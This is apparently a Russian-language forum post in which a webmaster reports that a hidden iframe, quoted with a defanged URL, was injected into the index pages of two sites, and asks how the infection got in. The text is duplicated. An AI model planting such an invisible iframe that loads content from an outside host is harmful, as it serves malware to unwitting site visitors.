Здравствуйте.
Вчера на двух сайтах, которыми я занимаюсь обнаружился один и тот же вирус.
Он вставляет в индексные страницы следующий код:
На переходите по ссылке, там вирус.
<iframe src="hxxp//:bigtopmanagement.cn:8080/ts/in.cgi?pepsi12" width=2 height=4 style="visibility: hidden"></iframe>
Никак не могу понять откуда он взялся. Пароли на FTP хранятся в отдельном файле и нигде не запоминаются. Я так понимаю, что пароли на административный вход вирусу мало чем помогут, если он специально не заточен под битрикс.
Один из сайтов находится на тестовой площадке и его индексация запрещена в robots.txt. Поэтому вероятность какого-то внешнего взлома мала.
Есть какие-нибудь мысли?
Вчера на двух сайтах, которыми я занимаюсь обнаружился один и тот же вирус.
Он вставляет в индексные страницы следующий код:
На переходите по ссылке, там вирус.
<iframe src="hxxp//:bigtopmanagement.cn:8080/ts/in.cgi?pepsi12" width=2 height=4 style="visibility: hidden"></iframe>
Никак не могу понять откуда он взялся. Пароли на FTP хранятся в отдельном файле и нигде не запоминаются. Я так понимаю, что пароли на административный вход вирусу мало чем помогут, если он специально не заточен под битрикс.
Один из сайтов находится на тестовой площадке и его индексация запрещена в robots.txt. Поэтому вероятность какого-то внешнего взлома мала.
Есть какие-нибудь мысли?